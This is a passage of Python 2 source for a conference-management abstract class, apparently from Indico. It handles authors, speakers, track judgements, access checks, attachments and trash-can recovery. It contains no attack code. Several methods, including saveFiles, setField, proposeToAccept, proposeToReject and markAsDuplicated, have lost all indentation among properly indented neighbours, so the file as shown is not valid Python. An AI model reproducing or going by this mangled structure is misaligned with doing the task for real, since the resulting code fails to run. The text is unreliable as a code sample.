        self._rating = None # It needs to be none to avoid the case of having the same value as the lowest value in the judgement
        self._attachments = {}
        self._attachmentsCounter = Counter()
    def __cmp__(self, other):
        """Python 2 ordering: abstracts sort by conference first, then by id."""
        if type(self) is not type(other):
            # This is actually dangerous and the ZODB manual says not to do this
            # because it relies on memory order. However, this branch should never
            # be taken anyway since we do not store different types in the same set
            # or use them as keys.
            return cmp(hash(self), hash(other))
        if self.getConference() == other.getConference():
            return cmp(self.getId(), other.getId())
        return cmp(self.getConference(), other.getConference())
    def clone(self, conference, abstractId):
        """Deep-copy this abstract into *conference* under *abstractId*.

        Copies fields, authors/speakers, contribution type, tracks, status,
        track judgements and attached files, re-resolving every track and
        contribution type against the target conference by title/name.
        """
        # abstractId - internal in abstract manager of the conference
        abs = Abstract(conference.getAbstractMgr(), abstractId, self.getSubmitter().getAvatar())
        abs.setTitle(self.getTitle())
        for key in self.getFields().keys():
            abs.setField(key,self.getField(key))
        abs.setComments(self.getComments())
        abs._setSubmissionDate(self.getSubmissionDate())
        abs._modificationDate = self.getModificationDate()
        # Cloning of primary- and coauthors
        # if an author is also a speaker, an appropriate object will be
        # appended also to the speaker list
        for pa in self.getPrimaryAuthorList() :
            npa = abs.newPrimaryAuthor(**(pa.getData()))
            if self.isSpeaker(pa) :
                abs.addSpeaker(npa)
        for ca in self.getCoAuthorList() :
            nca = abs.newCoAuthor(**(ca.getData()))
            if self.isSpeaker(ca) :
                abs.addSpeaker(nca)
        # Cloning of speakers
        # only those, who are not authors :
        for sp in self.getSpeakerList() :
            if not self.isAuthor(sp) :
                abs.addSpeaker(sp.clone())
        abs.setSubmitter(self.getSubmitter().getAvatar())
        # Re-resolve the contribution type by name in the target conference.
        if self.getContribType() is not None :
            for ct in conference.getContribTypeList() :
                if self.getContribType().getName() == ct.getName() :
                    abs.setContribType(ct)
                    break
        else :
            abs.setContribType(None)
        # the track, to which the abstract belongs to
        # legacy list implementation
        for tr in self.getTrackList() :
            for newtrack in conference.getTrackList():
                if newtrack.getTitle() == tr.getTitle() :
                    abs.addTrack(newtrack)
        # overall abstract status (accepted / rejected)
        abs._currentStatus = self._currentStatus.clone(abs)
        # Per-track judgements are re-attached to the matching target tracks
        # (matched by title) and replayed into the historical record.
        for ta in self.getTrackAcceptanceList() :
            for newtrack in conference.getTrackList():
                if newtrack.getTitle() == ta.getTrack().getTitle() :
                    newta = ta.clone(newtrack)
                    abs._addTrackAcceptance(newta)
                    abs._addTrackJudgementToHistorical(newta)
        for trj in self.getTrackRejections().values() :
            for newtrack in conference.getTrackList():
                if newtrack.getTitle() == trj.getTrack().getTitle() :
                    newtrj = trj.clone(newtrack)
                    abs._addTrackRejection(newtrj)
                    abs._addTrackJudgementToHistorical(newtrj)
        for trl in self.getTrackReallocations().values() :
            for newtrack in conference.getTrackList():
                if newtrack.getTitle() == trl.getTrack().getTitle() :
                    newtrl = trl.clone(newtrack)
                    abs._addTrackReallocation(newtrl)
                    abs._addTrackJudgementToHistorical(newtrl)
        # Cloning materials
        for f in self.getAttachments().values():
            newFile = f.clone(abs, protection=False)
            abs.__addFile(newFile)
        return abs
    def getUniqueId( self ):
        """Return (string) the unique identifier of the item.

        Used only in the web-session access-key table; it is the same as
        the conference's id, since only the conference can be protected
        with an access key.
        """
        return self.getConference().getUniqueId()
    def getMergeFromList(self):
        # Abstracts that were merged into this one; the list is created
        # lazily because older persisted objects may lack the attribute.
        try:
            return self._mergeFromList
        except AttributeError:
            self._mergeFromList = PersistentList()
            return self._mergeFromList
    def addMergeFromAbstract(self, abstract):
        # Record that *abstract* was merged into this one; lazy init for
        # objects persisted before _mergeFromList existed.
        try:
            if self._mergeFromList:
                pass
        except AttributeError:
            self._mergeFromList = PersistentList()
        self._mergeFromList.append(abstract)
    def removeMergeFromAbstract(self, abstract):
        # Undo addMergeFromAbstract; silently a no-op when *abstract* is
        # not in the list.
        try:
            if self._mergeFromList:
                pass
        except AttributeError:
            self._mergeFromList = PersistentList()
        if abstract in self._mergeFromList:
            self._mergeFromList.remove(abstract)
    def getComments(self):
        """Return the comments string ("" when never set)."""
        try:
            return self._comments
        except AttributeError:
            self._comments = ""
            return self._comments
    def setComments(self, comments):
        self._comments = comments
    def __addFile(self, file):
        # Archive *file* in the conference repository and register it in
        # the attachments mapping under its id.
        file.archive(self.getConference()._getRepository())
        self.getAttachments()[file.getId()] = file
        self._notifyModification()
def saveFiles(self, files):
cfg = Config.getInstance()
from MaKaC.conference import LocalFile
for fileUploaded in files:
if fileUploaded.filename:
# create a temp file
tempPath = cfg.getUploadedFilesTempDir()
tempFileName = tempfile.mkstemp(suffix="IndicoAbstract.tmp", dir=tempPath)[1]
f = open(tempFileName, "wb")
f.write(fileUploaded.file.read() )
f.close()
file = LocalFile()
file.setFileName(fileUploaded.filename)
file.setFilePath(tempFileName)
file.setOwner(self)
file.setId(self._getAttachmentsCounter())
self.__addFile(file)
    def deleteFilesNotInList(self, keys):
        """This method is used in order to delete all the files that are not present (by id) in the
        parameter "keys".
        This is useful when files are deleted from the abstract form using Javascript, and so it is
        the only way to know that they are deleted.
        """
        existingKeys = self.getAttachments().keys()
        for key in existingKeys:
            if not key in keys:
                self._deleteFile(key)
    def _deleteFile(self, key):
        # Removes the file from storage (file.delete()) and from the
        # attachments mapping.
        file = self.getAttachments()[key]
        file.delete()
        del self.getAttachments()[key]
        self._notifyModification()
    def removeResource(self, res):
        """Necessary because LocalFile.delete (see _deleteFile) is calling this method.
        In our case, nothing to do.
        """
        pass
    def _setOwner( self, owner ):
        # owner's owner is the conference (see getConference)
        self._owner = owner
    def getOwner( self ):
        return self._owner
    def _setId( self, id ):
        # ids are always stored as strings
        self._id = str( id )
    def getId(self):
        return self._id
    def _setSubmissionDate( self, newDate ):
        self._submissionDate = newDate
    def setModificationDate(self, dt = None):
        """Set the modification date; defaults to the current UTC time."""
        if dt:
            self._modificationDate = dt
        else:
            self._modificationDate = nowutc()
    def _notifyModification( self, dt=None ):
        # Refresh the modification date and mark the persistent object
        # as changed for ZODB.
        self.setModificationDate(dt)
        self._p_changed = 1
    def getModificationDate( self ):
        return self._modificationDate
    def _setSubmitter( self, av ):
        """Replace the submitter by a Submitter built from avatar *av*.

        The previous submitter, if any, is first unregistered from the
        owner, unlinked from this abstract and deleted. Raises MaKaCError
        when *av* is missing.
        """
        if not av:
            raise MaKaCError( _("An abstract must have a submitter"))
        if self._submitter:
            self.getOwner().unregisterParticipation( self._submitter )
            self._submitter.getUser().unlinkTo(self, "submitter")
            self._submitter.delete()
        self._submitter=Submitter( self, av )
        av.linkTo(self, "submitter")
        self.getOwner().registerParticipation( self._submitter )
        self._notifyModification()
    def recoverSubmitter(self, subm):
        # Trash-can recovery variant: reuses an existing Submitter object
        # instead of building a new one from an avatar.
        if not subm:
            raise MaKaCError( _("An abstract must have a submitter"))
        if self._submitter:
            self.getOwner().unregisterParticipation( self._submitter )
            self._submitter.delete()
        self._submitter = subm
        self._submitter.setAbstract(self)
        self.getOwner().registerParticipation( self._submitter )
        subm.recover()
        self._notifyModification()
    def setSubmitter( self, av ):
        self._setSubmitter(av)
    def getSubmitter( self ):
        return self._submitter
    def isSubmitter( self, av ):
        return self.getSubmitter().representsUser( av )
    def setTitle(self, title):
        # stored stripped of surrounding whitespace
        self._title = title.strip()
        self._notifyModification()
    def getTitle(self):
        return self._title
    def getFields(self):
        # mapping field id -> AbstractFieldContent (see setField)
        return self._fields
    def removeField(self, field):
        if self.getFields().has_key(field):
            del self.getFields()[field]
            self._notifyModification()
def setField(self, fid, v):
if isinstance(v, AbstractFieldContent):
v = v.value
try:
self.getFields()[fid].value = v
self._notifyModification()
except:
afm = self.getConference().getAbstractMgr().getAbstractFieldsMgr()
f = next(f for f in afm.getFields() if f.getId() == fid)
if f is not None:
self.getFields()[fid] = AbstractFieldContent(f, v)
def getField(self, field):
if self.getFields().has_key(field):
return self.getFields()[field]
else:
return ""
    def getSubmissionDate( self ):
        # Lazily defaulted to "now" for legacy objects missing the field.
        try:
            if self._submissionDate:
                pass
        except AttributeError:
            self._submissionDate=nowutc()
        return self._submissionDate
    def getConference( self ):
        # the owner is the abstract manager, whose owner is the conference
        mgr = self.getOwner()
        return mgr.getOwner() if mgr else None
    def _newAuthor( self, **data ):
        # Create an Author from **data, assign it a fresh id and register
        # it in the authors mapping.
        author = Author( self, **data )
        author.setId( self._authorGen.newCount() )
        self._authors[ author.getId() ] = author
        return author
    def _removeAuthor(self,part):
        # No-op when *part* is not an author of this abstract.
        if not self.isAuthor(part):
            return
        part.delete()
        del self._authors[part.getId()]
    def isAuthor( self, part ):
        return self._authors.has_key( part.getId() )
    def getAuthorList( self ):
        return self._authors.values()
    def getAuthorById(self, id):
        # ids are stored as strings, hence the str() conversion
        return self._authors.get(str(id), None)
    def clearAuthors( self ):
        # primary- and co-author removal also drops the underlying
        # author records (see _removePrimaryAuthor/_removeCoAuthor)
        self.clearPrimaryAuthors()
        self.clearCoAuthors()
        self._notifyModification()
    def newPrimaryAuthor(self,**data):
        """Create a new author from **data and flag it as primary author."""
        auth=self._newAuthor(**data)
        self._addPrimaryAuthor(auth)
        self._notifyModification()
        return auth
    def isPrimaryAuthor( self, part ):
        return part in self._primaryAuthors
    def getPrimaryAuthorList( self ):
        return self._primaryAuthors
    #XXX: I keep it for compatibility but it should be removed
    getPrimaryAuthorsList = getPrimaryAuthorList
def getPrimaryAuthorEmailList(self, lower=False):
emailList = []
for pAuthor in self.getPrimaryAuthorList():
emailList.append(pAuthor.getEmail().lower() if lower else pAuthor.getEmail())
return emailList
    def clearPrimaryAuthors(self):
        # remove-first-until-empty so the bookkeeping in
        # _removePrimaryAuthor runs for each author
        while len(self._primaryAuthors)>0:
            self._removePrimaryAuthor(self._primaryAuthors[0])
        self._notifyModification()
    def _addPrimaryAuthor( self, part ):
        """Flag an existing author as primary; keeps the owner's author
        index up to date. Raises MaKaCError when *part* is not an author."""
        if not self.isAuthor( part ):
            raise MaKaCError( _("The participation you want to set as primary author is not an author of the abstract"))
        if part in self._primaryAuthors:
            return
        self._primaryAuthors.append( part )
        self.getOwner().indexAuthor(part)
    def _removePrimaryAuthor(self,part):
        # Also drops the speaker role, unindexes the author on the owner
        # and removes the underlying author record.
        if not self.isPrimaryAuthor(part):
            return
        if self.isSpeaker(part):
            self.removeSpeaker(part)
        self.getOwner().unindexAuthor(part)
        self._primaryAuthors.remove(part)
        self._removeAuthor(part)
    def recoverPrimaryAuthor(self, auth):
        # Re-attach a previously deleted primary author (trash-can recovery).
        self._authors[ auth.getId() ] = auth
        auth.setAbstract(self)
        self._addPrimaryAuthor(auth)
        auth.recover()
        self._notifyModification()
    def newCoAuthor(self,**data):
        """Create a new author from **data and flag it as co-author."""
        auth=self._newAuthor(**data)
        self._addCoAuthor(auth)
        self._notifyModification()
        return auth
    def _comp_CoAuthors(self):
        # Lazy migration: build the co-author list (every author that is
        # not primary) for objects persisted before it existed.
        try:
            if self._coAuthors!=None:
                return
        except AttributeError:
            self._coAuthors=PersistentList()
        for auth in self._authors.values():
            if not self.isPrimaryAuthor(auth):
                self._addCoAuthor(auth)
    def isCoAuthor( self, part ):
        self._comp_CoAuthors()
        return part in self._coAuthors
    def getCoAuthorList( self ):
        self._comp_CoAuthors()
        return self._coAuthors
    def getCoAuthorEmailList(self, lower=False):
        """Return the e-mail addresses of all co-authors (lower-cased when
        *lower* is true)."""
        emailList = []
        for coAuthor in self.getCoAuthorList():
            emailList.append(coAuthor.getEmail().lower() if lower else coAuthor.getEmail())
        return emailList
    def clearCoAuthors(self):
        # remove-first-until-empty so the speaker/author bookkeeping in
        # _removeCoAuthor runs for each of them
        while len(self._coAuthors)>0:
            self._removeCoAuthor(self._coAuthors[0])
        self._notifyModification()
def _addCoAuthor( self, part ):
self._comp_CoAuthors()
if not self.isAuthor( part ):
raise MaKaCError( _("The participation you want to set as primary author is not an author of the abstract"))
if part in self._coAuthors:
return
self._coAuthors.append( part )
    def _removeCoAuthor(self,part):
        # Also drops the speaker role and the underlying author record.
        if not self.isCoAuthor(part):
            return
        if self.isSpeaker(part):
            self.removeSpeaker(part)
        self._coAuthors.remove(part)
        self._removeAuthor(part)
    def recoverCoAuthor(self, auth):
        # Re-attach a previously deleted co-author (trash-can recovery).
        self._authors[ auth.getId() ] = auth
        auth.setAbstract(self)
        self._addCoAuthor(auth)
        auth.recover()
        self._notifyModification()
    def addSpeaker( self, part ):
        """Flag an existing author *part* as speaker; raises MaKaCError
        when *part* is not an author of the abstract."""
        if not self.isAuthor( part ):
            raise MaKaCError( _("The participation you want to set as speaker is not an author of the abstract"))
        if part in self._speakers:
            return
        self._speakers.append( part )
        self._notifyModification()
    def removeSpeaker(self,part):
        if part not in self._speakers:
            return
        self._speakers.remove(part)
    def clearSpeakers( self ):
        # empty one by one, then reset the persistent list itself
        while len(self.getSpeakerList()) > 0:
            self.removeSpeaker(self.getSpeakerList()[0])
        self._speakers = PersistentList()
    def getSpeakerList( self ):
        return self._speakers
    def isSpeaker( self, part ):
        return part in self._speakers
    def setContribType( self, contribType ):
        # the single contribution type is kept at slot 0 of _contribTypes
        self._contribTypes[0] = contribType
        self._notifyModification()
    def getContribType( self ):
        return self._contribTypes[0]
    def _addTrack( self, track ):
        """Adds the specified track to the suggested track list. Any
        verification must be done by the caller.
        """
        self._tracks[ track.getId() ] = track
        track.addAbstract( self )
        self._notifyModification()
    def addTrack( self, track ):
        # Public variant: migrates legacy track storage, skips duplicates
        # and keeps the abstract status in sync.
        self._changeTracksImpl()
        if not self._tracks.has_key( track.getId() ):
            self._addTrack( track )
            self.getCurrentStatus().update()
    def _removeTrack( self, track ):
        """Removes the specified track from the track list. Any verification
        must be done by the caller.
        """
        del self._tracks[ track.getId() ]
        track.removeAbstract( self )
        self._notifyModification()
    def removeTrack( self, track ):
        if self._tracks.has_key( track.getId() ):
            self._removeTrack( track )
            self.getCurrentStatus().update()
            # an accepted abstract whose track is removed keeps its
            # status but loses the track reference
            if isinstance(self.getCurrentStatus(), AbstractStatusAccepted):
                self.getCurrentStatus()._setTrack(None)
    def _changeTracksImpl( self ):
        # One-shot migration of the legacy list-based track storage to an
        # OOBTree keyed by track id.
        if self._tracks.__class__ != OOBTree:
            oldTrackList = self._tracks
            self._tracks = OOBTree()
            for track in oldTrackList:
                self._addTrack( track )
            self.getCurrentStatus().update()
    def getTrackList( self ):
        self._changeTracksImpl()
        return self._tracks.values()
    def getAcceptedTrack(self):
        # Only meaningful for accepted abstracts; otherwise returns None
        # (implicitly for non-accepted statuses).
        status = self.getCurrentStatus()
        if status is None:
            return None
        if isinstance(status, AbstractStatusAccepted):
            return status.getTrack()
    def hasTrack( self, track ):
        self._changeTracksImpl()
        return self._tracks.has_key( track.getId() )
    def getTrackListSorted( self ):
        # sorting is delegated to the conference
        self._changeTracksImpl()
        return self.getConference().sortTrackList( self._tracks.values() )
    def clearTracks( self ):
        self._changeTracksImpl()
        while len(self.getTrackList())>0:
            track = self.getTrackList()[0]
            self._removeTrack( track )
        self.getCurrentStatus().update()
    def setTracks( self, trackList ):
        """Set the suggested track classification of the current abstract to
        the specified list
        """
        #We need to do it in 2 steps otherwise the list over which we are
        # iterating gets modified
        toBeRemoved = []
        toBeAdded = copy( trackList )
        for track in self.getTrackList():
            if track not in trackList:
                toBeRemoved.append( track )
            else:
                toBeAdded.remove( track )
        for track in toBeRemoved:
            self._removeTrack( track )
        for track in toBeAdded:
            self._addTrack( track )
        self.getCurrentStatus().update()
    def isProposedForTrack( self, track ):
        return self._tracks.has_key( track.getId() )
    def getNumTracks(self):
        return len( self._tracks )
    def getLocator(self):
        # the conference locator extended with this abstract's id
        loc = self.getConference().getLocator()
        loc["abstractId"] = self.getId()
        return loc
    def isAllowedToCoordinate(self, av):
        """Tells whether or not the specified user can coordinate any of the
        tracks of this abstract
        """
        for track in self.getTrackList():
            if track.canUserCoordinate(av):
                return True
        return False
    def canAuthorAccess(self, user):
        # True when any of *user*'s e-mails matches (case-insensitively)
        # a primary or co-author e-mail of this abstract.
        if user is None:
            return False
        el = self.getCoAuthorEmailList(True)+self.getPrimaryAuthorEmailList(True)
        for e in user.getEmails():
            if e.lower() in el:
                return True
        return False
    def isAllowedToAccess(self, av):
        """Tells whether or not an avatar can access an abstract independently
        of the protection
        """
        #any author is allowed to access
        #CFA managers are allowed to access
        #any user being able to modify is also allowed to access
        #any TC is allowed to access
        if self.canAuthorAccess(av):
            return True
        if self.isAllowedToCoordinate(av):
            return True
        return self.canUserModify(av)
    def canAccess(self, aw):
        #if the conference is protected, then only allowed AW can access
        return self.isAllowedToAccess(aw.getUser())
    def canView(self, aw):
        #in the future it would be possible to add an access control
        #only those users allowed to access are allowed to view
        return self.isAllowedToAccess(aw.getUser())
    def canModify(self, aw_or_user):
        # accepts either an access wrapper or a plain user object
        if hasattr(aw_or_user, 'getUser'):
            aw_or_user = aw_or_user.getUser()
        return self.canUserModify(aw_or_user)
    def canUserModify(self, av):
        #the submitter can modify
        if self.isSubmitter(av):
            return True
        #??? any CFA manager can modify
        #??? any user granted with modification privileges can modify
        #conference managers can modify
        conf = self.getConference()
        return conf.canUserModify(av)
    def getModifKey(self):
        # abstracts have no modification key of their own
        return ""
    def getAccessKey(self):
        # abstracts have no access key of their own
        return ""
    def getAccessController(self):
        # protection is delegated entirely to the conference
        return self.getConference().getAccessController()
    def isProtected(self):
        return self.getConference().isProtected()
    def delete(self):
        """Detach the abstract from its manager and move it to the trash can.

        Order matters: the submitter is unregistered and deleted first,
        then authors/speakers/tracks are cleared, and only then is the
        owner dropped and notified; finally the status is reset and the
        object handed to the TrashCanManager. No-op when already ownerless.
        """
        if self._owner:
            self.getOwner().unregisterParticipation(self._submitter)
            self._submitter.getUser().unlinkTo(self, "submitter")
            self._submitter.delete()
            self._submitter = None
            self.clearAuthors()
            self.clearSpeakers()
            self.clearTracks()
            owner = self._owner
            self._owner = None
            owner.removeAbstract(self)
            self.setCurrentStatus(AbstractStatusNone(self))
            TrashCanManager().add(self)
    def recoverFromTrashCan(self):
        TrashCanManager().remove(self)
    def getCurrentStatus(self):
        # Lazy default: legacy objects without a status are considered
        # "submitted".
        try:
            if self._currentStatus:
                pass
        except AttributeError, e:
            self._currentStatus = AbstractStatusSubmitted(self)
        return self._currentStatus
    def setCurrentStatus(self, newStatus):
        self._currentStatus = newStatus
        #If we want to keep a history of status changes we should add here
        # the old status to a list
    def accept(self, responsible, destTrack, type, comments="", session=None):
        """Final acceptance of the abstract by *responsible*.

        Delegates the state transition to the current status object, makes
        the abstract visible under *destTrack* (when given) and creates
        the corresponding AcceptedContribution, optionally scheduled in
        *session*.
        """
        self.getCurrentStatus().accept(responsible, destTrack, type, comments)
        #add the abstract to the track for which it has been accepted so it
        # is visible for it.
        if destTrack is not None:
            destTrack.addAbstract(self)
        #once the abstract is accepted a new contribution under the destination
        # track must be created
        # ATTENTION: This import is placed here explicitely for solving
        # problems with circular imports
        from MaKaC.conference import AcceptedContribution
        contrib = AcceptedContribution(self)
        if session:
            contrib.setSession(session)
            contrib.setDuration(dur=session.getContribDuration())
        else:
            contrib.setDuration()
        self.getCurrentStatus().setContribution(contrib)
        self._setContribution(contrib)
    def reject(self, responsible, comments=""):
        """Final rejection of the abstract (state transition only)."""
        self.getCurrentStatus().reject(responsible, comments)
def _cmpByDate(self, tj1, tj2):
return cmp(tj1.getDate(), tj2.getDate())
    def getTrackJudgementsHistorical(self):
        """Return {track_id: [judgements, newest first]}.

        Lazily (re)built: legacy persisted objects may lack the attribute
        (seed with the latest judgement known for each suggested track)
        or store a tuple (reset to an empty dict).
        """
        try:
            if self._trackJudgementsHistorical:
                pass
            if type(self._trackJudgementsHistorical) == tuple:
                self._trackJudgementsHistorical = {}
        except AttributeError:
            self._trackJudgementsHistorical = {}
            for track in self.getTrackList():
                judgement = None
                if self.getTrackAcceptances().has_key(track.getId()):
                    judgement = self.getTrackAcceptances()[track.getId()]
                elif self.getTrackRejections().has_key(track.getId()):
                    judgement = self.getTrackRejections()[track.getId()]
                elif self.getTrackReallocations().has_key(track.getId()):
                    judgement = self.getTrackReallocations()[track.getId()]
                self._trackJudgementsHistorical[track.getId()] = [judgement]
            self._notifyModification()
        return self._trackJudgementsHistorical
    def getJudgementHistoryByTrack(self, track):
        """History for *track*; judgements made with no track are kept
        under the "notrack" key. Returns [] when there is none."""
        id = "notrack"
        if track is not None:
            id = track.getId()
        if self.getTrackJudgementsHistorical().has_key(id):
            return self.getTrackJudgementsHistorical()[id]
        return []
    def _addTrackJudgementToHistorical(self, tj):
        # newest judgements go to the front of the per-track list
        id = "notrack"
        if tj.getTrack() is not None:
            id = tj.getTrack().getId()
        if self.getTrackJudgementsHistorical().has_key(id):
            if tj not in self.getTrackJudgementsHistorical()[id]:
                self.getTrackJudgementsHistorical()[id].insert(0, tj)
        else:
            self.getTrackJudgementsHistorical()[id] = [tj]
        self._notifyModification()
    def _removeTrackAcceptance( self, track ):
        """Drop the acceptance proposal stored for *track*, if any."""
        if self.getTrackAcceptances().has_key( track.getId() ):
            del self.getTrackAcceptances()[ track.getId() ]
    def _addTrackAcceptance( self, judgement ):
        """Store an acceptance proposal, displacing any rejection or
        reallocation kept for the same track."""
        self._removeTrackRejection( judgement.getTrack() )
        self._removeTrackReallocation( judgement.getTrack() )
        self.getTrackAcceptances()[ judgement.getTrack().getId() ] = judgement
        self._addTrackJudgementToHistorical(judgement)
    def _removeTrackRejection( self, track ):
        """Drop the rejection proposal stored for *track*, if any."""
        if self.getTrackRejections().has_key( track.getId() ):
            del self.getTrackRejections()[ track.getId() ]
    def _addTrackRejection( self, judgement ):
        """Store a rejection proposal, displacing any acceptance or
        reallocation kept for the same track."""
        self._removeTrackAcceptance( judgement.getTrack() )
        self._removeTrackReallocation( judgement.getTrack() )
        self.getTrackRejections()[ judgement.getTrack().getId() ] = judgement
        self._addTrackJudgementToHistorical(judgement)
    def _removeTrackReallocation( self, track ):
        """Drop the reallocation proposal stored for *track*, if any."""
        if self.getTrackReallocations().has_key( track.getId() ):
            del self.getTrackReallocations()[ track.getId() ]
    def _addTrackReallocation( self, judgement ):
        """Store a reallocation proposal, displacing any acceptance or
        rejection kept for the same track."""
        self._removeTrackAcceptance( judgement.getTrack() )
        self._removeTrackRejection( judgement.getTrack() )
        self.getTrackReallocations()[ judgement.getTrack().getId() ] = judgement
        self._addTrackJudgementToHistorical(judgement)
    def _clearTrackRejections( self ):
        # remove-first-until-empty so each removal goes through the
        # proper per-track bookkeeping
        while len(self.getTrackRejections().values())>0:
            t = self.getTrackRejections().values()[0].getTrack()
            self._removeTrackRejection( t )
    def _clearTrackAcceptances( self ):
        while len(self.getTrackAcceptances().values())>0:
            t = self.getTrackAcceptances().values()[0].getTrack()
            self._removeTrackAcceptance( t )
    def _clearTrackReallocations( self ):
        while len(self.getTrackReallocations().values())>0:
            t = self.getTrackReallocations().values()[0].getTrack()
            self._removeTrackReallocation(t)
def _removePreviousJud(self, responsible, track):
''' Check if there is a previous judgement and remove it '''
toDelete = [] # list of judgements to delete
for jud in self.getJudgementHistoryByTrack(track):
if jud.getResponsible() == responsible:
toDelete.append(jud)
for x in toDelete:
self.getTrackJudgementsHistorical()[track.getId()].remove(x)
def proposeToAccept( self, responsible, track, contribType, comment="", answers=[] ):
"""
"""
# the proposal has to be done for a track
if track is None:
raise MaKaCError( _("You have to choose a track in order to do the proposal. If there are not tracks to select, please change the track assignment of the abstract"))
#We check the track for which the abstract is proposed to be accepted
# is in the current abstract
if not self.isProposedForTrack( track ):
raise MaKaCError( _("Cannot propose to accept an abstract which is not proposed for the specified track"))
# check if there is a previous judgement of this author in for this abstract in this track
self._removePreviousJud(responsible, track)
# Create the new judgement
jud = AbstractAcceptance( track, responsible, contribType, answers )
jud.setComment( comment )
self._addTrackAcceptance( jud )
# Update the rating of the abstract
self.updateRating()
#We trigger the state transition
self.getCurrentStatus().proposeToAccept()
def proposeToReject( self, responsible, track, comment="", answers=[] ):
"""
"""
# the proposal has to be done for a track
if track is None:
raise MaKaCError( _("You have to choose a track in order to do the proposal. If there are not tracks to select, please change the track assignment of the abstract"))
#We check the track for which the abstract is proposed to be accepted
# is in the current abstract
if not self.isProposedForTrack( track ):
raise MaKaCError( _("Cannot propose to reject an abstract which is not proposed for the specified track"))
# check if there is a previous judgement of this author in for this abstract in this track
self._removePreviousJud(responsible, track)
# Create the new judgement
jud = AbstractRejection( track, responsible, answers )
jud.setComment( comment )
self._addTrackRejection( jud )
# Update the rating of the abstract
self.updateRating()
#We trigger the state transition
self.getCurrentStatus().proposeToReject()
def proposeForOtherTracks( self, responsible, track, comment, propTracks, answers=[] ):
"""
"""
#We check the track which proposes to allocate the abstract is in the
# current abstract
if not self.isProposedForTrack( track ):
raise MaKaCError( _("Cannot propose to reallocate an abstract which is not proposed for the specified track"))
# check if there is a previous judgement of this author in for this abstract in this track
self._removePreviousJud(responsible, track)
#We keep the track judgement
jud = AbstractReallocation( track, responsible, propTracks, answers )
jud.setComment( comment )
self._addTrackReallocation( jud )
#We add the proposed tracks to the abstract
for track in propTracks:
self._addTrack( track )
#We trigger the state transition
self.getCurrentStatus().proposeToReallocate()
# Update the rating of the abstract
self.updateRating()
    def withdraw(self,resp,comment=""):
        """Withdraw the abstract (state transition only)."""
        self.getCurrentStatus().withdraw(resp,comment)
    def recover( self ):
        """Puts a withdrawn abstract back in the list of submitted abstracts.
        HAS NOTHING TO DO WITH THE RECOVERY PROCESS...
        """
        #we must clear any track judgement
        #self._clearTrackAcceptances()
        #self._clearTrackRejections()
        #self._clearTrackReallocations()
        self.getCurrentStatus().recover() #status change
        #if succeeded we must reset the submission date
        self._setSubmissionDate( nowutc() )
        self._notifyModification()
    def getTrackJudgement( self, track ):
        """Return the latest judgement for *track*; AbstractInConflict
        when the track's history mixes judgement types; None when there is
        no history at all."""
        if not self.getJudgementHistoryByTrack(track):
            return None
        lastJud = self.getJudgementHistoryByTrack(track)[0]
        # check if judgements for specified trak are the same. If not there is a conflict.
        if all(jud.__class__ == lastJud.__class__ for jud in self.getJudgementHistoryByTrack(track)):
            return lastJud
        return AbstractInConflict(track)
    def getTrackAcceptances( self ):
        # track_id -> acceptance judgement; OOBTree created lazily
        try:
            if self._trackAcceptances:
                pass
        except AttributeError, e:
            self._trackAcceptances = OOBTree()
        return self._trackAcceptances
    def getTrackAcceptanceList( self ):
        # only acceptances for tracks the abstract is still proposed for
        res = []
        for trackId in intersection( self._tracks, self.getTrackAcceptances() ):
            res.append( self.getTrackAcceptances()[ trackId ] )
        return res
    def getNumProposedToAccept( self ):
        return len( intersection( self._tracks, self.getTrackAcceptances() ) )
    def getTrackRejections( self ):
        # track_id -> rejection judgement; OOBTree created lazily
        try:
            if self._trackRejections:
                pass
        except AttributeError, e:
            self._trackRejections = OOBTree()
        return self._trackRejections
    def getNumProposedToReject( self ):
        return len( intersection( self._tracks, self.getTrackRejections() ) )
    def getTrackReallocations( self ):
        # track_id -> reallocation judgement; OOBTree created lazily
        try:
            if self._trackReallocations:
                pass
        except AttributeError, e:
            self._trackReallocations = OOBTree()
        return self._trackReallocations
    def getNumProposedToReallocate( self ):
        return len( intersection( self._tracks, self.getTrackReallocations() ) )
    def getNumJudgements( self ):
        """
        Returns the number of tracks for which some proposal has been done.
        For instance, let's suppose:
           Track 1: 2 propose to accept, 3 propose to reject
           Track 2: 1 propose to accept
           Track 3: None
        The result would be 2 (out of 3)
        """
        tmp1 = union( self.getTrackAcceptances(), self.getTrackRejections() )
        judgements = union( tmp1, self.getTrackReallocations() )
        return len( intersection( self._tracks, judgements ) )
    def getReallocationTargetedList( self, track ):
        #XXX: not optimal
        # linear scan over every reallocation judgement proposing *track*
        res = []
        for r in self.getTrackReallocations().values():
            if track in r.getProposedTrackList():
                res.append( r )
        return res
    def getContribution( self ):
        # Lazy attribute; for accepted abstracts fall back to the
        # contribution stored on the status object.
        try:
            if self._contribution:
                pass
        except AttributeError:
            self._contribution = None
        status = self.getCurrentStatus()
        if isinstance(status,AbstractStatusAccepted) and \
                self._contribution is None:
            self._contribution=status.getContribution()
        return self._contribution
    def _setContribution(self,contrib):
        self._contribution = contrib
    def getIntCommentList(self):
        # internal (review) comments; list created lazily
        try:
            if self._intComments:
                pass
        except AttributeError:
            self._intComments=PersistentList()
        return self._intComments
    def addIntComment(self,newComment):
        """Attach an internal comment, assigning it an id if it has none."""
        try:
            if self._intComments:
                pass
        except AttributeError:
            self._intComments=PersistentList()
        try:
            if self._intCommentsGen:
                pass
        except AttributeError:
            self._intCommentsGen=Counter()
        if newComment in self._intComments:
            return
        id = newComment.getId()
        if id == "":
            # NOTE(review): the id is taken from _authorGen even though
            # _intCommentsGen is initialised above and never used — this
            # looks like a bug, but switching generators could clash with
            # comment ids already persisted; confirm before changing.
            id = self._authorGen.newCount()
        newComment.includeInAbstract(self, id)
        self._intComments.append(newComment)
    def getIntCommentById(self,id):
        """Return the internal comment whose id equals *id* (stripped),
        or None when not found."""
        try:
            if self._intComments:
                pass
        except AttributeError:
            self._intComments=PersistentList()
        for comment in self._intComments:
            if id.strip()==comment.getId():
                return comment
        return None
    def clearIntCommentList(self):
        while len(self.getIntCommentList()) > 0:
            self.removeIntComment(self.getIntCommentList()[0])
    def removeIntComment(self,comment):
        # no-op when *comment* is not attached to this abstract
        try:
            if self._intComments:
                pass
        except AttributeError:
            self._intComments=PersistentList()
        if comment not in self._intComments:
            return
        self._intComments.remove(comment)
        comment.delete()
    def recoverIntComment(self, comment):
        # trash-can recovery for an internal comment
        self.addIntComment(comment)
        comment.recover()
def markAsDuplicated(self,responsible,originalAbstract,comments="", track=None, answers=[]):
"""
"""
self.getCurrentStatus().markAsDuplicated(responsible,originalAbstract,comments)
